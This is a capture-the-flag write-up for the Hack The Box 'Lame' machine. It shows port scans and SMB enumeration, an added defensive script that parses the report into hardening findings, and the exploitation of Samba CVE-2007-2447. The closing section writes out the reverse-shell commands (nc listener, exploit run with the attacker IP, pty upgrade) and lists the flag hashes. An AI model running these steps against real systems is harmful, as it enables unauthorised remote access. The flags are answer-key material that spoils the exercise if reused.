Lame is an easy Linux machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.

Difficulty: Easy
OS: Linux

Official machine link: Hack The Box Lame

YouTube video for this machine: Terminal Trouble - HTB Lame

rustscan --addresses "$TARGET" --top

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
0day was here ♥

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 1073741716'.
Open 10.129.117.112:21
Open 10.129.117.112:22
Open 10.129.117.112:139
Open 10.129.117.112:445
Open 10.129.117.112:3632
[~] Starting Script(s)
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2024-12-16 22:07 CET
Initiating Ping Scan at 22:07
Scanning 10.129.117.112 [4 ports]
Completed Ping Scan at 22:07, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 22:07
Scanning lame.htb (10.129.117.112) [5 ports]
Discovered open port 21/tcp on 10.129.117.112
Discovered open port 22/tcp on 10.129.117.112
Discovered open port 3632/tcp on 10.129.117.112
Discovered open port 445/tcp on 10.129.117.112
Discovered open port 139/tcp on 10.129.117.112
Completed SYN Stealth Scan at 22:07, 0.07s elapsed (5 total ports)
Nmap scan report for lame.htb (10.129.117.112)
Host is up, received echo-reply ttl 63 (0.045s latency).
Scanned at 2024-12-16 22:07:33 CET for 0s

PORT     STATE SERVICE      REASON
21/tcp   open  ftp          syn-ack ttl 63
22/tcp   open  ssh          syn-ack ttl 63
139/tcp  open  netbios-ssn  syn-ack ttl 63
445/tcp  open  microsoft-ds syn-ack ttl 63
3632/tcp open  distccd      syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
           Raw packets sent: 9 (372B) | Rcvd: 6 (248B)

enum4linux-ng -A $TARGET

ENUM4LINUX - next generation (v1.3.4)

 ==========================
|    Target Information    |
 ==========================
[*] Target ........... 10.129.117.112
[*] Username ......... ''
[*] Random Username .. 'hnriocui'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)

 =======================================
|    Listener Scan on 10.129.117.112    |
 =======================================
[*] Checking LDAP
[-] Could not connect to LDAP on 389/tcp: timed out
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: timed out
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

 =============================================================
|    NetBIOS Names and Workgroup/Domain for 10.129.117.112    |
 =============================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out

 ===========================================
|    SMB Dialect Check on 10.129.117.112    |
 ===========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
  SMB 1.0: true
  SMB 2.02: false
  SMB 2.1: false
  SMB 3.0: false
  SMB 3.1.1: false
Preferred dialect: SMB 1.0
SMB1 only: true
SMB signing required: false
[*] Enforcing legacy SMBv1 for further enumeration

 =============================================================
|    Domain Information via SMB session for 10.129.117.112    |
 =============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: LAME
NetBIOS domain name: ''
DNS domain: hackthebox.gr
FQDN: lame.hackthebox.gr
Derived membership: workgroup member
Derived domain: unknown

 ===========================================
|    RPC Session Check on 10.129.117.112    |
 ===========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE

 =====================================================
|    Domain Information via RPC for 10.129.117.112    |
 =====================================================
[+] Domain: WORKGROUP
[+] Domain SID: NULL SID
[+] Membership: workgroup member

 =================================================
|    OS Information via RPC for 10.129.117.112    |
 =================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Linux/Unix (Samba 3.0.20-Debian)
OS version: '4.9'
OS release: not supported
OS build: not supported
Native OS: Unix
Native LAN manager: Samba 3.0.20-Debian
Platform id: '500'
Server type: '0x9a03'
Server type string: Wk Sv PrQ Unx NT SNT lame server (Samba 3.0.20-Debian)

 =======================================
|    Users via RPC on 10.129.117.112    |
 =======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 35 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 35 user(s) via 'enumdomusers'
[+] After merging user results we have 35 user(s) total:
'1000':
  username: root
  name: root
  acb: '0x00000011'
  description: (null)
'1002':
  username: daemon
  name: daemon
  acb: '0x00000011'
  description: (null)
'1004':
  username: bin
  name: bin
  acb: '0x00000011'
  description: (null)
'1006':
  username: sys
  name: sys
  acb: '0x00000011'
  description: (null)
'1008':
  username: sync
  name: sync
  acb: '0x00000011'
  description: (null)
'1010':
  username: games
  name: games
  acb: '0x00000011'
  description: (null)
'1012':
  username: man
  name: man
  acb: '0x00000011'
  description: (null)
'1014':
  username: lp
  name: lp
  acb: '0x00000011'
  description: (null)
'1016':
  username: mail
  name: mail
  acb: '0x00000011'
  description: (null)
'1018':
  username: news
  name: news
  acb: '0x00000011'
  description: (null)
'1020':
  username: uucp
  name: uucp
  acb: '0x00000011'
  description: (null)
'1026':
  username: proxy
  name: proxy
  acb: '0x00000011'
  description: (null)
'1066':
  username: www-data
  name: www-data
  acb: '0x00000011'
  description: (null)
'1068':
  username: backup
  name: backup
  acb: '0x00000011'
  description: (null)
'1076':
  username: list
  name: Mailing List Manager
  acb: '0x00000011'
  description: (null)
'1078':
  username: irc
  name: ircd
  acb: '0x00000011'
  description: (null)
'1082':
  username: gnats
  name: Gnats Bug-Reporting System (admin)
  acb: '0x00000011'
  description: (null)
'1200':
  username: libuuid
  name: (null)
  acb: '0x00000011'
  description: (null)
'1202':
  username: dhcp
  name: (null)
  acb: '0x00000011'
  description: (null)
'1204':
  username: syslog
  name: (null)
  acb: '0x00000011'
  description: (null)
'1206':
  username: klog
  name: (null)
  acb: '0x00000011'
  description: (null)
'1208':
  username: sshd
  name: (null)
  acb: '0x00000011'
  description: (null)
'1210':
  username: bind
  name: (null)
  acb: '0x00000011'
  description: (null)
'1212':
  username: postfix
  name: (null)
  acb: '0x00000011'
  description: (null)
'1214':
  username: ftp
  name: (null)
  acb: '0x00000011'
  description: (null)
'1216':
  username: postgres
  name: PostgreSQL administrator,,,
  acb: '0x00000011'
  description: (null)
'1218':
  username: mysql
  name: MySQL Server,,,
  acb: '0x00000011'
  description: (null)
'1220':
  username: tomcat55
  name: (null)
  acb: '0x00000011'
  description: (null)
'1222':
  username: distccd
  name: (null)
  acb: '0x00000011'
  description: (null)
'1224':
  username: telnetd
  name: (null)
  acb: '0x00000011'
  description: (null)
'1226':
  username: proftpd
  name: (null)
  acb: '0x00000011'
  description: (null)
'3000':
  username: msfadmin
  name: msfadmin,,,
  acb: '0x00000010'
  description: (null)
'3002':
  username: user
  name: just a user,111,,
  acb: '0x00000010'
  description: (null)
'3004':
  username: service
  name: ',,,'
  acb: '0x00000011'
  description: (null)
'501':
  username: nobody
  name: nobody
  acb: '0x00000011'
  description: (null)

 ========================================
|    Groups via RPC on 10.129.117.112    |
 ========================================
[*] Enumerating local groups
[+] Found 0 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 0 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 0 group(s) via 'enumdomgroups'

 ========================================
|    Shares via RPC on 10.129.117.112    |
 ========================================
[*] Enumerating shares
[+] Found 5 share(s):
ADMIN$:
  comment: IPC Service (lame server (Samba 3.0.20-Debian))
  type: IPC
IPC$:
  comment: IPC Service (lame server (Samba 3.0.20-Debian))
  type: IPC
opt:
  comment: ''
  type: Disk
print$:
  comment: Printer Drivers
  type: Disk
tmp:
  comment: oh noes!
  type: Disk
[*] Testing share ADMIN$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share IPC$
[+] Mapping: OK, Listing: NOT SUPPORTED
[*] Testing share opt
[+] Mapping: DENIED, Listing: N/A
[*] Testing share print$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share tmp
[+] Mapping: OK, Listing: OK

 ===========================================
|    Policies via RPC for 10.129.117.112    |
 ===========================================
[*] Trying port 445/tcp
[-] SMB connection error on port 445/tcp: STATUS_ACCESS_DENIED
[*] Trying port 139/tcp
[-] SMB connection error on port 139/tcp: STATUS_ACCESS_DENIED

 ===========================================
|    Printers via RPC for 10.129.117.112    |
 ===========================================
[+] No printers returned (this is not an error)

Completed after 25.29 seconds

Found a vulnerable Samba version: CVE-2007-2447 | Samba 3.0.20 < 3.0.25rc 'Username map script' Command Execution
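
For the team that owns a host like this, the same report reads as a hardening checklist. The following added example (not part of the original writeup or of enum4linux-ng) parses the text report and returns the findings that need remediation: SMB1-only, unsigned SMB, null sessions, a Samba version in the range named above, and shares an anonymous session can map and list. The `triage` function and the finding labels are hypothetical names; the sample lines are copied from the report above.

```python
import re

# Constructed sample: lines copied from the enum4linux-ng report shown above.
SAMPLE = """\
SMB1 only: true
SMB signing required: false
[+] Server allows session using username '', password ''
Native LAN manager: Samba 3.0.20-Debian
[*] Testing share ADMIN$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share tmp
[+] Mapping: OK, Listing: OK
"""

# Range taken from the advisory title quoted on the page (3.0.20 < 3.0.25rc).
# Assumption: release-candidate suffixes are ignored, so 3.0.25rcN is not flagged.
VULN_MIN, VULN_MAX = (3, 0, 20), (3, 0, 25)


def triage(report: str) -> list[str]:
    """Return hardening findings from an enum4linux-ng text report."""
    findings, share = [], None
    for raw in report.splitlines():
        line = raw.strip()
        if line == "SMB1 only: true":
            findings.append("smb1-only")
        elif line == "SMB signing required: false":
            findings.append("signing-not-required")
        elif "allows session using username ''" in line:
            findings.append("null-session")
        elif m := re.search(r"Native LAN manager: Samba (\d+)\.(\d+)\.(\d+)", line):
            version = tuple(int(part) for part in m.groups())
            if VULN_MIN <= version < VULN_MAX:
                findings.append("cve-2007-2447-version:" + ".".join(m.groups()))
        elif m := re.match(r"\[\*\] Testing share (\S+)", line):
            share = m.group(1)  # remember which share the next result line is for
        elif share and line.startswith("[+] Mapping:"):
            if "Mapping: OK" in line and "Listing: OK" in line:
                findings.append("anonymous-share:" + share)
            share = None
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```
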

Exploit - https://github.com/TerminalTrouble/CVE-2007-2447

Install the Python SMB library (pysmb)
pip3 install pysmb

Start listener
rlwrap nc -lvnp 1337

Execute exploit
python3 exploit.py $IP 139 10.10.14.149 1337

Upgrade the shell to a full TTY
python -c 'import pty; pty.spawn("/bin/bash")'

Locate user flag

root@lame:/root# find /home/
find /home/
/home/
/home/service
/home/service/.profile
/home/service/.bashrc
/home/service/.bash_logout
/home/ftp
/home/makis
/home/makis/user.txt
/home/makis/.profile
/home/makis/.sudo_as_admin_successful
/home/makis/.bash_history
/home/makis/.bashrc
/home/makis/.bash_logout
/home/user
/home/user/.ssh
/home/user/.ssh/id_dsa.pub
/home/user/.ssh/id_dsa
/home/user/.profile
/home/user/.bash_history
/home/user/.bashrc
/home/user/.bash_logout

user - /home/makis/user.txt
4856f0131ec6755a26b1186dbf2dbb33

root - /root/root.txt
ed2b7155b71d373f2015df9e3c13c06e